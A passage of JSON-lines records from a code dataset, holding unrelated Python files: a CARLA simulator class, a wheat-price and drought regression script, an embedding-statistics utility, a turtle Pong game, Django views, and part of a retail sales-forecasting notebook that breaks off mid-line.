carla.Rotation(yaw=0))\n # self.right_sensor = SimSensor(self.world.spawn_actor(obstacle_sensor_bp, transform, attach_to=self.car))\n # self.right_sensor.listen()\n\n transform = carla.Transform(carla.Location(x=0.0, y=0.8, z=1), carla.Rotation(yaw=0))\n self.mid_sensor = SimSensor(self.world.spawn_actor(obstacle_sensor_bp, transform, attach_to=self.car), max_range=40)\n self.mid_sensor.listen()\n\n # self.sensor_group = SimSensorGroup(None, [self.left_sensor, self.mid_sensor, self.right_sensor], [\"left\", \"mid\", \"right\"])\n self.sensor_group = SimSensorGroup(None, [self.mid_sensor], [\"mid\"])\n finish()\n\n # ======================================================\n # -- Abstract Methods ----------------------------------\n # ======================================================\n\n def get_speed(self) -> Speed:\n\n speed_vector = self.car.get_velocity()\n current_speed = math.sqrt(speed_vector.x**2 + speed_vector.y**2 + speed_vector.z**2) / 3.6\n if current_speed > self.max_speed:\n self.max_speed = current_speed\n\n speed_time = time.perf_counter()\n return Speed(current_speed, speed_time)\n\n def set_throttle(self, val: float):\n self.car.apply_control(carla.VehicleControl(throttle=val))\n\n def set_brake(self, val):\n self.car.apply_control(carla.VehicleControl(brake=val))\n\n def run_forever(self):\n pass\n\n def warn(self):\n msg = \"\"\"\n _______ _______ ______ _ _ _______ _____ ____ _ _ _ \n /\\ |__ __| |__ __| | ____| | \\ | | |__ __| |_ _| / __ \\ | \\ | | | |\n / \\ | | | | | |__ | \\| | | | | | | | | | | \\| | | |\n / /\\ \\ | | | | | __| | . ` | | | | | | | | | | . ` | | |\n / ____ \\ | | | | | |____ | |\\ | | | _| |_ | |__| | | |\\ | |_|\n /_/ \\_\\ |_| |_| |______| |_| \\_| |_| |_____| \\____/ |_| \\_| (_)\n \"\"\"\n print(msg)\n\n\nif __name__ == \"__main__\":\n with Simulator(Scenario.FAST_DYNAMIC) as sim:\n brain = NoCollide(None, sim.sensor_group)\n\n brain.driver = sim\n time.sleep(2)\n brain.run()\n print(f\"Max Speed: {sim.max_speed*3.6} km/h\")\n try:\n while True:\n pass\n except KeyboardInterrupt:\n pass","repo_name":"cayox/NoCollide","sub_path":"src/simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":6697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"44060935092","text":"# Bakalarka\n\nimport pandas as pd\nfrom matplotlib import pyplot\nimport numpy as np\n\n# Prices \n\nfname_prices = \"/Users/kristian/bakalarka/MonthlyPrices.csv\"\ndata = pd.read_csv(fname_prices, \";\")\n\ndata[\"date\"] = pd.to_datetime(data[\"date\"], format = \"%YM%m\")\nprices = pd.DataFrame(data)\nprices = prices.set_index(\"date\")\nprices.index.name = \"Month\"\nprices = prices[[\"Wheat, US HRW\"]]\nprices = prices.loc[\"1960-02-01\":]\nprint(prices_short.head())\n\n# SPEI (change positives to negatives)\n\nfname_spei = \"/Users/kristian/Desktop/bakalářka/data sucho/wheat (US great plains) - 160.csv\"\nspei = pd.read_csv(fname_spei, \";\")\nspei[\"DATA\"] = pd.to_datetime(spei[\"DATA\"], format = \"%b%Y\")\nspei_df = pd.DataFrame(spei)\nspei_df = spei_df.set_index(\"DATA\")\nspei1 = spei_df[\"SPEI_3\"]\nspei1 = spei1.loc[\"1960-02-01\":]\nspei2 = np.array([-x for x in spei1])\nspei2 = pd.DataFrame({\"SPEI_3\": spei2}, index = prices_short.index)\n\nprint(spei2.head())\n#np.corrcoef(prices,spei2)\npyplot.plot(spei2)\npyplot.plot(prices_short)\n\n\n# Relative changes\n## Prices \n\nrelative_changes = prices_short.pct_change()\nrelative_changes = relative_changes.dropna()\nrelative_changes = pd.DataFrame(relative_changes)\nrelative_changes = relative_changes *100\npyplot.plot(relative_changes)\nprint(relative_changes)\n\n# Dickey-Fuller test for non-staionarity:prices\nfrom statsmodels.tsa.stattools import adfuller\nX = relative_changes.iloc[:,0].values\nresult = adfuller(X)\nprint('ADF Statistic: %f' % result[0])\nprint('p-value: %f' % result[1])\nprint('Critical Values:')\nfor key, value in result[4].items():\n print('\\t%s: %.3f' % (key, value))\n \n# Dickey-Fuller test for non-staionarity: spei\nX = spei2.iloc[:,0].values\nresult = adfuller(X)\nprint('ADF Statistic: %f' % result[0])\nprint('p-value: %f' % result[1])\nprint('Critical Values:')\nfor key, value in result[4].items():\n print('\\t%s: %.3f' % (key, value)) \n\n# OLS before filtering\n\nfrom sklearn.metrics import mean_squared_error, r2_score\nimport statsmodels.api as sm\n\nols = pd.concat([relative_changes, spei2], axis = 1)\nols = ols[\"1960-03-01\":]\nprint(ols)\nY = ols[\"Wheat, US HRW\"] \nX = ols[\"SPEI_3\"]\n\nmodel = sm.OLS(Y,X)\nresults = model.fit()\nprint(np.corrcoef(X,Y))\nresults.summary()\n\n# Filter\nj = 5\n\ndef movingaverage_shorter (values, window):\n weights = np.repeat(1.0, window)/(window)\n sma = np.convolve(values, weights, 'valid')\n return sma\n\ndef movingaverage_longer (values, window):\n weights = np.repeat(1.0, window)/window\n sma = np.convolve(values, weights, 'valid')\n return sma\n\npriceMA = movingaverage_shorter(X[2**(j):],2**j) - movingaverage_longer(X,2**(j+1))\nspeiMA = movingaverage_shorter(Y[2**(j):],2**j) - movingaverage_longer(Y,2**(j+1))\n\nspeiMA1 = pd.DataFrame({\"SPEI_3\": speiMA}, index = relative_changes.index[2**(j+1)-1:])\npriceMA1 = pd.DataFrame({\"Rice, Thai 5%\": priceMA}, index = relative_changes.index[2**(j+1)-1:])\nols_filter = pd.concat([priceMA1, speiMA1], axis = 1)\nols_filter\n\npyplot.plot(priceMA1)\npyplot.plot(speiMA1)\nnp.corrcoef(priceMA,speiMA)\n\n# OLS after filter\n\nYY = ols_filter[\"Wheat, US HRW\"]\nXX = ols_filter[\"SPEI_3\"]\n\nmodel = sm.OLS(YY,XX)\nresults = model.fit()\nresults.summary()\n","repo_name":"kkrispikk/Bakalarka","sub_path":"bakalarka.py","file_name":"bakalarka.py","file_ext":"py","file_size_in_byte":3176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19697865978","text":"#!/usr/bin/env python3\n\nimport sys\nsys.path.append(\"src\")\nfrom misc.load_utils import read_pickle\nimport argparse\nimport numpy as np\n\nparser = argparse.ArgumentParser(description='Basic embedding file statistics')\nparser.add_argument('--data', default=\"/data/hp/dpr-c.embd\")\nargs = parser.parse_args()\n\ndata = read_pickle(args.data)\n\nprint(f\"Number of queries: {len(data['queries']):>7}\")\nprint(f\"Number of docs: {len(data['docs']):>7}\")\nprint(f\"Query shape: {data['queries'][0].shape}\")\nprint(f\"Query element type: {str(data['queries'][0].dtype)}\")\nprint()\nprint()\nprint(\"Boundaries:\", data[\"boundaries\"])\nprint()\nprint(\n f'Average number of spans per question: {np.average([len(x) for x in data[\"relevancy\"]]):.2f}'\n)\nprint(\n f'Average number of spans per document: {np.average([len(x) for x in data[\"relevancy_articles\"]]):.2f}'\n)\nprint()\n\ndata[\"queries\"] = np.array(data[\"queries\"])\ndata[\"docs\"] = np.array(data[\"docs\"])\n\nprint(f\"Average of query embedding 1-norm:\",\n \"{:.3f}\".format(np.average(np.linalg.norm(\n data[\"queries\"], axis=1, ord=1))),\n \"std:\",\n \"{:.3f}\".format(np.std(np.linalg.norm(data[\"queries\"], axis=1, ord=1)))\n )\nprint(f\"Average of doc embedding 1-norm: \",\n \"{:.3f}\".format(np.average(np.linalg.norm(data[\"docs\"], axis=1, ord=1))),\n \"std:\",\n \"{:.3f}\".format(np.std(np.linalg.norm(data[\"docs\"], axis=1, ord=1)))\n )\nprint()\nprint(f\"Average of query embedding 2-norm:\",\n \"{:.3f}\".format(np.average(np.linalg.norm(\n data[\"queries\"], axis=1, ord=2))),\n \"std:\",\n \"{:.3f}\".format(np.std(np.linalg.norm(data[\"queries\"], axis=1, ord=2)))\n )\nprint(f\"Average of doc embedding 2-norm: \",\n \"{:.3f}\".format(np.average(np.linalg.norm(data[\"docs\"], axis=1, ord=2))),\n \"std:\",\n \"{:.3f}\".format(np.std(np.linalg.norm(data[\"docs\"], axis=1, ord=2)))\n )\n","repo_name":"zouharvi/kb-shrink","sub_path":"src/misc/analyze_size.py","file_name":"analyze_size.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"30257573888","text":"from turtle import Screen\r\nfrom paddle import Paddle\r\nfrom ball import Ball\r\nfrom scoreboard import Scoreboard\r\ngame_is_on = True\r\nBALL_SPEED = 0.2\r\n\r\nscreen = Screen()\r\n\r\nscreen.setup(width=800, height=600)\r\nscreen.bgcolor(\"black\")\r\nscreen.title(\"Pong King!\")\r\nscreen.tracer(0)\r\npaddle_left = Paddle(-390)\r\npaddle_right = Paddle(380)\r\nscoreboard_left = Scoreboard(-200)\r\nscoreboard_right = Scoreboard(200)\r\nscoreboard_left.create_middle()\r\nball = Ball()\r\n\r\nscreen.listen()\r\nscreen.onkeypress(key=\"Up\", fun=paddle_right.up)\r\nscreen.onkeypress(key=\"Down\", fun=paddle_right.down)\r\nscreen.onkeypress(key=\"w\", fun=paddle_left.up)\r\nscreen.onkeypress(key=\"s\", fun=paddle_left.down)\r\n#\r\n\r\nwhile game_is_on:\r\n screen.update()\r\n ball.move()\r\n # detect colission with up and down boundary\r\n if ball.ycor() > 270 or ball.ycor() < -280:\r\n ball.collision_with_up_down()\r\n # detect collision with paddle\r\n for seg in paddle_left.paddle_body:\r\n if ball.distance(seg) < 15:\r\n ball.collision_with_paddle()\r\n ball.speed_up()\r\n for seg in paddle_right.paddle_body:\r\n if ball.distance(seg) < 15:\r\n ball.collision_with_paddle()\r\n ball.speed_up()\r\n # detect collision with right boundary\r\n if ball.xcor() > 380:\r\n scoreboard_left.score +=1\r\n scoreboard_left.update()\r\n ball.recenter()\r\n # detect collision with right boundary\r\n if ball.xcor() < -380:\r\n scoreboard_right.score += 1\r\n scoreboard_right.update()\r\n ball.recenter()\r\nscreen.exitonclick()\r\n","repo_name":"inosven/Projects-of-100-Days-of-Code-Python-2023-","sub_path":"day22-pong-game/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"3439796502","text":"from django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.shortcuts import redirect\nfrom django.urls import reverse\nfrom django.views.generic import ListView, CreateView, UpdateView\n\nfrom locations.models import Locations\n\n\nclass LocationsView(LoginRequiredMixin, ListView):\n model = Locations\n template_name = 'locations/locations_index.html'\n paginate_by = 2\n\n\nclass CreateLocationsView(LoginRequiredMixin, CreateView):\n model = Locations\n fields = ['name']\n template_name = 'locations/locations_form.html'\n\n def get_success_url(self):\n return reverse('locations:lista_locatii')\n\n\nclass UpdateLocationsView(LoginRequiredMixin, UpdateView):\n model = Locations\n fields = ['name', 'coordinates', 'last_accessed', 'mark']\n template_name = 'locations/locations_form.html'\n\n def get_success_url(self):\n return reverse('locations:lista_locatii')\n\n\n@login_required\ndef delete_locations(request, pk):\n Locations.objects.filter(id=pk).update(active=0)\n return redirect('locations:lista_locatii')\n\n\n@login_required\ndef activate_locations(request, pk):\n Locations.objects.filter(id=pk).update(active=1)\n return redirect('locations:lista_locatii')\n","repo_name":"nasteeex/Licenta","sub_path":"django_project/gui/locations/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"3046319375","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n#importing necessary libraries\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport statsmodels.api as sm\nimport warnings\n\nfrom sklearn.metrics import mean_squared_error, mean_absolute_error\n\nwarnings.filterwarnings(\"ignore\")\n\n\n# # Loading the dataset\n\n# In[2]:\n\n\ntrain_df=pd.read_csv(r\"C:\\Users\\HP\\Downloads\\tcs projec dataset\\train_data.csv\")\n\n\n# In[3]:\n\n\ntest_df=pd.read_csv(r\"C:\\Users\\HP\\Downloads\\tcs projec dataset\\test_data.csv\")\n\n\n# In[4]:\n\n\nprice_df=pd.read_csv(r\"C:\\Users\\HP\\Downloads\\tcs projec dataset\\product_prices.csv\")\n\n\n# In[5]:\n\n\ndate_df=pd.read_csv(r\"C:\\Users\\HP\\Downloads\\tcs projec dataset\\date_to_week_id_map.csv\")\n\n\n# In[6]:\n\n\nsample_df=pd.read_csv(r\"C:\\Users\\HP\\Downloads\\tcs projec dataset\\sample_submission.csv\")\n\n\n# In[7]:\n\n\ntrain_df\n\n\n# In[8]:\n\n\ntest_df\n\n\n# In[9]:\n\n\nprice_df\n\n\n# In[10]:\n\n\ndate_df\n\n\n# In[11]:\n\n\nsample_df\n\n\n# ## Joining the datasets with common column\n\n# In[12]:\n\n\ntrain_df.columns\n\n\n# In[13]:\n\n\n#joining price and date datasets using inner join\n\ndf=pd.merge(price_df,date_df, on=['week_id'], how='inner')\n\n\n# In[14]:\n\n\ndf1=pd.merge(train_df,df, on=['date','product_identifier','outlet'], how='inner')\ndf1.head()\n\n\n# # ----------------------------------------------------------------------------------\n\n# # Data Analysis\n\n# In[15]:\n\n\ndf1.shape\n\n\n# In[16]:\n\n\ndf1.info()\n\n\n# In[17]:\n\n\ndf1.describe()\n\n\n# In[18]:\n\n\n# Checking for Null Values\ndf1.isna().sum()\n\n\n# In[19]:\n\n\ndf1.columns\n\n\n# In[20]:\n\n\n#checking the cloumns having Dtype 'O'\n\n\n# In[21]:\n\n\ndf1['category_of_product'].unique()\n\n\n# In[22]:\n\n\ndf1['state'].unique()\n\n\n# In[23]:\n\n\n#converting the date column data type to data and time\n\n\n# In[24]:\n\n\ndata=df1.copy()\n\n\n# In[25]:\n\n\ndata1=df1.copy()\n\n\n# In[26]:\n\n\ndata['date'] = pd.to_datetime(data['date'])\n\n\n# In[27]:\n\n\ndata.info()\n\n\n# In[28]:\n\n\n# Setting index to 'datetime'\ndata.set_index('date', inplace=True)\n\n\n# In[29]:\n\n\ndata\n\n\n# # --------------------------------------------------------------------------------------------\n\n# # Feature Engineering\n\n# In[30]:\n\n\ndata=data.reset_index('date')\n\n\n# In[31]:\n\n\n# Extracting additional features from 'date'\ndata['year'] = pd.to_datetime(data['date']).dt.year\ndata['month'] = pd.to_datetime(data['date']).dt.month\ndata['day'] = pd.to_datetime(data['date']).dt.day\n\n\n# In[32]:\n\n\ndata=data.set_index('date')\n\n\n# In[33]:\n\n\ndata\n\n\n# In[34]:\n\n\n# Grouping feature into categorical data and numerical data\n\n\n# In[35]:\n\n\ndata.info()\n\n\n# In[36]:\n\n\ncategorical_features=[features for features in data.columns if data[features].dtypes==\"O\"]\n\n\n# In[37]:\n\n\nnumerical_features=[features for features in data.columns if data[features].dtypes!=\"O\" and features not in ['date','year', 'month','day','week_id']]\nnumerical_features\n\n\n# In[38]:\n\n\n#Seperating numerical features into contionus and discrete features.\ncontinous_features=[features for features in numerical_features if len(data[features].unique()) > 50 ]\n\n\n# In[39]:\n\n\ndiscrete_features =[features for features in numerical_features if len(data[features].unique()) <= 50]\n\n\n# In[40]:\n\n\ncategorical_features\n\n\n# In[41]:\n\n\ncontinous_features\n\n\n# In[42]:\n\n\ndiscrete_features\n\n\n# # ----------------------------------------------------------------------------\n\n# ### Splitting Dataset based on Category of Product\n\n# In[43]:\n\n\ndata['category_of_product'].unique()\n\n\n# ## Drinks and Food\n\n# In[44]:\n\n\n#Now we create a dataframe which includes only data related to drinks_and_food sales. \ndrinks_and_food= data.loc[data['category_of_product'] == 'drinks_and_food']\ndrinks_and_food\n\n\n# In[45]:\n\n\n#Now let's sort drinks_and_food dataframe according to date\ndrinks_and_food = drinks_and_food.sort_values('date')\ndrinks_and_food\n\n\n# In[46]:\n\n\n#Now let's find how much total drinks_and_food sales occurred on each date\ndrinks_and_food1 =drinks_and_food.groupby('date')['sales'].sum().reset_index('date')\n\n\n# In[47]:\n\n\ndrinks_and_food1\n\n\n# In[48]:\n\n\n#Now let's set the date column as the index column\ndrinks_and_food1 = drinks_and_food1.set_index('date')\ndrinks_and_food1\n\n\n# In[49]:\n\n\n#Now let's see whether there is any frequency in the dataframe\ndrinks_and_food1.index\n\n\n# In[50]:\n\n\n#Now let's resample the data into means of monthly sales of drinks_and_food and save this into a new variable called date\ny_drinks_and_food = drinks_and_food1['sales'].resample('MS').mean()\ny_drinks_and_food\n\n\n# In[51]:\n\n\n#Now let's check the monthly sales value happened in year 2013\nprint(y_drinks_and_food['2013':])\n\n\n# ## Fast Moving Consumer Goods\n\n# In[52]:\n\n\n#Now we create a dataframe which includes only data related to drinks_and_food sales. \nfast_moving_consumer_goods= data.loc[data['category_of_product'] == 'fast_moving_consumer_goods']\nfast_moving_consumer_goods\n\n\n# In[53]:\n\n\n#Now let's sort fast_moving_consumer_goods dataframe according to date\nfast_moving_consumer_goods= fast_moving_consumer_goods.sort_values('date')\nfast_moving_consumer_goods\n\n\n# In[54]:\n\n\n#Now let's find how much total fast_moving_consumer_goods sales occurred on each date\nfast_moving_consumer_goods1 =fast_moving_consumer_goods.groupby('date')['sales'].sum().reset_index()\n\n\n# In[55]:\n\n\nfast_moving_consumer_goods1\n\n\n# In[56]:\n\n\n#Now let's set the date column as the index column\nfast_moving_consumer_goods1 = fast_moving_consumer_goods1.set_index('date')\nfast_moving_consumer_goods1\n\n\n# In[57]:\n\n\n#Now let's see whether there is any frequency in the dataframe\nfast_moving_consumer_goods1.index\n\n\n# In[58]:\n\n\n#Now let's resample the data into means of monthly sales of fast_moving_consumer_goods and save this into a new variable called date\ny_fast_moving_consumer_goods = fast_moving_consumer_goods1['sales'].resample('MS').mean()\ny_fast_moving_consumer_goods\n\n\n# In[59]:\n\n\n#Now let's check the monthly sales value happened in year 2013\nprint(y_fast_moving_consumer_goods['2013':])\n\n\n# ## Others\n\n# In[60]:\n\n\n#Now we create a dataframe which includes only data related to others sales. \nothers= data.loc[data['category_of_product'] == 'others']\nothers\n\n\n# In[61]:\n\n\n#Now let's sort others dataframe according to date\nothers = others.sort_values('date')\nothers\n\n\n# In[62]:\n\n\n#Now let's find how much total others sales occurred on each date\nothers1 =others.groupby('date')['sales'].sum().reset_index()\n\n\n# In[63]:\n\n\nothers1\n\n\n# In[64]:\n\n\n#Now let's set the date column as the index column\nothers1 = others1.set_index('date')\nothers1\n\n\n# In[65]:\n\n\n#Now let's see whether there is any frequency in the dataframe\nothers1.index\n\n\n# In[66]:\n\n\n#Now let's resample the data into means of monthly sales of others and save this into a new variable called date\ny_others = others1['sales'].resample('MS').mean()\ny_others\n\n\n# In[67]:\n\n\n#Now let's check the monthly sales value happened in year 2013\nprint(y_others['2013':])\n\n\n# ## Arranging Data Product-wise\n\n# In[68]:\n\n\nsales_grouped = data.groupby(['product_identifier', 'date']).sum()\n\n#sales_grouped\n\n# Group the sales by product identifier and date\nsales_grouped = pd.pivot_table(data, values='sales', index='date', columns='product_identifier', aggfunc=sum)\n\n\n#sales_grouped\n\nsales_monthly = sales_grouped.resample('MS').mean()\n\nsales_monthly\n\n#sales_monthly.info()\n\n\n# In[69]:\n\n\nprice_grouped = data.groupby(['product_identifier', 'date']).sum()\n\n#sales_grouped\n\n# Group the sales by product identifier and date\nprice_grouped = pd.pivot_table(data, values='sell_price', index='date', columns='product_identifier', aggfunc=sum)\n\n\n#sales_grouped\n\nprice_monthly = price_grouped.resample('MS').mean()\n\nprice_monthly\n\n#sales_monthly.info()\n\n\n# # ----------------------------------------------------------------------------------------\n\n# # DATA VISUALIZATION\n\n# ### Plotting the sales data for each categories\n\n# In[70]:\n\n\ndrinks_and_food1.plot(figsize=(20,5))\n\n\n# In[71]:\n\n\nfast_moving_consumer_goods1.plot(figsize=(20,5))\n\n\n# In[72]:\n\n\nothers1.plot(figsize=(20,5))\n\n\n# # Plotting the mean sales data for each categories\n\n# In[73]:\n\n\ny_drinks_and_food.plot(figsize=(15,6))\nplt.title(\"drinks_and_food supplies sales\")\nplt.ylabel(\"Sales\")\nplt.show()\n\n\n# In[74]:\n\n\ny_fast_moving_consumer_goods.plot(figsize=(15,6))\nplt.title(\"fast_moving_consumer_goods supplies sales\")\nplt.ylabel(\"Sales\")\nplt.show()\n\n\n# In[75]:\n\n\ny_others.plot(figsize=(15,6))\nplt.title(\"others supplies sales\")\nplt.ylabel(\"Sales\")\nplt.show()\n\n\n# # ------------------------------------------------------------------------------------\n\n# # Performing ETS Decomposition\n\n# # a) Drinks and Food\n\n# In[76]:\n\n\nfrom pylab import rcParams\nrcParams['figure.figsize']=18,8\ndecomposition_drinks_and_food = sm.tsa.seasonal_decompose(y_drinks_and_food,model='additive')\nfig = decomposition_drinks_and_food.plot()\nplt.show()\n\n\n# In[77]:\n\n\ndecomposition_drinks_and_food.trend.plot(figsize=(18,5))\n\n\n# In[78]:\n\n\ndecomposition_drinks_and_food.seasonal.plot(figsize=(18,5))\n\n\n# # b) Fast MovingConsumer Goods\n\n# In[79]:\n\n\nfrom pylab import rcParams\nrcParams['figure.figsize']=18,8\ndecomposition_fast_moving_consumer_goods = sm.tsa.seasonal_decompose(y_fast_moving_consumer_goods,model='additive')\nfig = decomposition_fast_moving_consumer_goods.plot()\nplt.show()\n\n\n# In[80]:\n\n\ndecomposition_fast_moving_consumer_goods.trend.plot(figsize=(18,5))\n\n\n# In[81]:\n\n\ndecomposition_fast_moving_consumer_goods.seasonal.plot(figsize=(18,5))\n\n\n# ## c) Others\n\n# In[82]:\n\n\nfrom pylab import rcParams\nrcParams['figure.figsize']=18,8\ndecomposition_others = sm.tsa.seasonal_decompose(y_others,model='additive')\nfig = decomposition_others.plot()\nplt.show()\n\n\n# In[83]:\n\n\ndecomposition_others.trend.plot(figsize=(18,5))\n\n\n# In[84]:\n\n\ndecomposition_others.seasonal.plot(figsize=(18,5))\n\n\n# In[85]:\n\n\nimport itertools\nimport statsmodels.api as sm\nfrom statsmodels.tsa.seasonal import seasonal_decompose\nimport matplotlib.pyplot as plt\n\nfor col in sales_monthly.columns:\n y = sales_monthly.loc[:, [col]]\n var_index = y.columns[0] # Get the variable index\n\n # Perform time series decomposition\n result = seasonal_decompose(y, model='additive', period=12)\n\n # Plot the decomposition\n fig, (ax1, ax2, ax3, ax4) = plt.subplots(4, 1, figsize=(10, 8))\n fig.suptitle('Time series decomposition of Average Sales for product ID {}'.format(var_index))\n ax1.set_ylabel('Observed')\n ax1.plot(y.index, y)\n ax2.set_ylabel('Trend')\n ax2.plot(y.index, result.trend)\n ax3.set_ylabel('Seasonal')\n ax3.plot(y.index, result.seasonal)\n ax4.set_ylabel('Residual')\n ax4.plot(y.index, result.resid)\n plt.show()\n\n\n# NOTE:Every product and category has seasonality\n\n# # ---------------------------------------------------------------------------\n\n# # Data visualization -part2\n\n# In[86]:\n\n\nsales_per_month=data['sales'].resample('M').sum()\nsales_per_day=data['sales'].resample('D').sum()\n\n\n# In[87]:\n\n\n# Plotting total sales per month\n\nplt.figure(figsize=(15,7))\nplt.title(\"Sales per month\")\nsns.lineplot(data = sales_per_month, dashes=False)\nplt.show()\n\n\n# In[88]:\n\n\n# Plotting total sales per day\n\nplt.figure(figsize=(15,7))\nplt.title(\"Sales per day\")\nsns.lineplot(data = sales_per_day, dashes=False)\nplt.show()\n\n\n# In[89]:\n\n\n# Plotting the Distribution of total sales data\n\nplt.figure(figsize=(8,6))\nsns.distplot(sales_per_month)\nplt.title('Total Sales Distribution')\nplt.show()\n\n\n# In[90]:\n\n\n# Plotting the Distribution of total sales per day data\n\nplt.figure(figsize=(8,6))\nsns.distplot(sales_per_day)\nplt.title('Total Sales per day Distribution')\nplt.show()\n\n\n# In[91]:\n\n\ndata=data.reset_index()\n\n\n# In[92]:\n\n\ndata['date'] = pd.to_datetime(data['date'])\n# Setting index to 'datetime'\ndata.set_index('date', inplace=True)\n\n\n# In[93]:\n\n\ncategory_data = data[data['category_of_product'] == 'drinks_and_food']\n\n# Group data by month and calculate the average sell price for each month\nmonthly_avg_sell_price = category_data.resample('M')['sell_price'].mean()\n\n# Plot the results\nplt.figure(figsize=(12,6))\nsns.lineplot(x=monthly_avg_sell_price.index, y=monthly_avg_sell_price)\nplt.title('Average selling price of drinks and food')\nplt.xlabel('Month')\nplt.ylabel('Average sell price')\nplt.show()\n\n\n# In[94]:\n\n\ndata = data.reset_index()\n\n\n# In[95]:\n\n\n# Group the data by month and calculate the mean selling price for each month\nmonthly_data = data.groupby(pd.Grouper(key='date', freq='M')).mean()\n\n# Create a line plot of the average selling price per month\nplt.plot(monthly_data.index, monthly_data['sell_price'])\n\n# Set the x-axis label\nplt.xlabel('Month')\n\n# Set the y-axis label\nplt.ylabel('Average Selling Price')\n\n# Set the title\nplt.title('Average Selling Price per Month')\n\n# Show the plot\nplt.show()\n\n\n# In[96]:\n\n\ntotal_sales = data.groupby('state')['sales'].sum().reset_index()\n\n# Sort values by sales in descending order\ntotal_sales = total_sales.sort_values(by='sales', ascending=False)\n\ncolors = ['orange','purple', 'green']\n\n\n\n# Create vertical bar plot\nfig, ax = plt.subplots(figsize=(8,6))\nax.bar(total_sales['state'], total_sales['sales'],width=0.8, color=colors)\n\n# Set labels and title\nax.grid(False)\nax.set_xlabel('State')\nax.set_ylabel('Total Sales')\nax.set_title('Total Sales per State')\n\nplt.show()\n\n\n# In[97]:\n\n\ntotal_sales = data.groupby('category_of_product')['sales'].sum().reset_index()\n\n# Sort values by sales in descending order\ntotal_sales = total_sales.sort_values(by='sales', ascending=False)\n\ncolors = ['black','blue', 'brown']\n\n\n\n# Create vertical bar plot\nfig, ax = plt.subplots(figsize=(8,6))\nax.bar(total_sales['category_of_product'], total_sales['sales'],width=0.8, color=colors)\n\n# Set labels and title\nax.grid(False)\nax.set_xlabel('Category of product')\nax.set_ylabel('Total Sales')\nax.set_title('Total Sales per category')\n\nplt.show()\n\n\n# In[98]:\n\n\naverage_price = data.groupby('category_of_product')['sell_price'].mean().reset_index()\n\n# Sort values by selling price in descending order\naverage_price = average_price.sort_values(by='sell_price', ascending=False)\n\ncolors = ['blue', 'brown','black']\n\n\n\n# Create vertical bar plot\nfig, ax = plt.subplots(figsize=(8,6))\nax.bar(average_price['category_of_product'], average_price['sell_price'],width=0.8, color=colors)\n\n# Set labels and title\nax.grid(False)\nax.set_xlabel('Category of product')\nax.set_ylabel('Average_selling_price')\nax.set_title('Average selling price per category')\n\nplt.show()\n\n\n# In[99]:\n\n\nplt.figure(figsize=(8,6))\nsns.barplot(x=data['department_identifier'], y=data['sales'])\nplt.title('Sales by different Departments')\nplt.show()\n\n\n# In[100]:\n\n\n# Plotting average sales with respect to outlets in a day\n\nplt.figure(figsize=(12,6))\nsns.barplot(x=data['outlet'], y=data['sales'])\nplt.title('average sales at different outlets in a day')\nplt.show()\n\n\n# In[101]:\n\n\n# Plotting average selling price with respect to departments \n\nplt.figure(figsize=(12,6))\nsns.barplot(x=data['department_identifier'], y=data['sell_price'])\nplt.title('average selling price of different department ')\nplt.show()\n\n\n# In[102]:\n\n\nplt.figure(figsize=(12,6))\nsns.barplot(x=data['product_identifier'], y=data['sell_price'])\nplt.title('Selling price of different products')\nplt.xticks(rotation=90)\nplt.show()\n\n\n# In[103]:\n\n\n# Plotting average selling price with respect to products\n\nplt.figure(figsize=(20,10))\nsns.barplot(x=data['product_identifier'], y=data['sell_price'],hue=data['category_of_product'])\nplt.title('average selling price of different products')\nplt.xticks(rotation=45)\nplt.show()\n\n\n# In[104]:\n\n\n# Plotting average sales with respect to products in a day\n\nplt.figure(figsize=(20,15))\nsns.barplot(x=data['product_identifier'], y=data['sales'],hue=data['category_of_product'])\nplt.title('average sales of products in a day')\nplt.xticks(rotation=45,ha='right')\nplt.show()\n\n\n# In[105]:\n\n\nprice_per_month = data.groupby(['year', 'month'])['sell_price'].mean().reset_index()\n\n# Filter the data for the two years you want to compare\nyear1_price = price_per_month[price_per_month['year'] == 2012]\nyear2_price = price_per_month[price_per_month['year'] == 2013]\nyear3_price = price_per_month[price_per_month['year'] == 2014]\n\n# Plot a line graph of the sales for each month in the two years\nplt.plot(year1_price['month'], year1_price['sell_price'], label='2012')\nplt.plot(year2_price['month'], year2_price['sell_price'], label='2013')\nplt.plot(year3_price['month'], year3_price['sell_price'], label='2014')\nplt.xlabel('Month')\nplt.ylabel('Average Selling Price')\nplt.title('Price Comparison between years 2012,2013 and 2014')\nplt.legend()\nplt.show()\n\n\n# In[106]:\n\n\nimport seaborn as sns\nimport matplotlib.pyplot as plt\ndata5=data.copy()\ndata5=data5.reset_index()\n# Filter the data for the desired category\ncategory_data = data5[data5['category_of_product'] == 'drinks_and_food']\n\n# Extract the year and month from the 'date' column\ncategory_data['year'] = category_data['date'].dt.year\ncategory_data['month'] = category_data['date'].dt.month\n\n# Group the data by year and month, and calculate the average selling price\navg_price = category_data.groupby(['year', 'month'])['sell_price'].mean().reset_index()\n\n# Plot the average selling price per month for each year using a line plot\nplt.figure(figsize=(12, 6))\nsns.lineplot(x='month', y='sell_price', hue='year', data=avg_price)\nplt.title('Average Selling Price per Month for ' + category_data['category_of_product'].iloc[0])\nplt.xlabel('Month')\nplt.ylabel('Average Selling Price')\nplt.show()\n\n\n# In[107]:\n\n\nimport seaborn as sns\nimport matplotlib.pyplot as plt\ndata5=data.copy()\ndata5=data5.reset_index()\n# Filter the data for the desired category\ncategory_data = data5[data5['category_of_product'] == 'fast_moving_consumer_goods']\n\n# Extract the year and month from the 'date' column\ncategory_data['year'] = category_data['date'].dt.year\ncategory_data['month'] = category_data['date'].dt.month\n\n# Group the data by year and month, and calculate the average 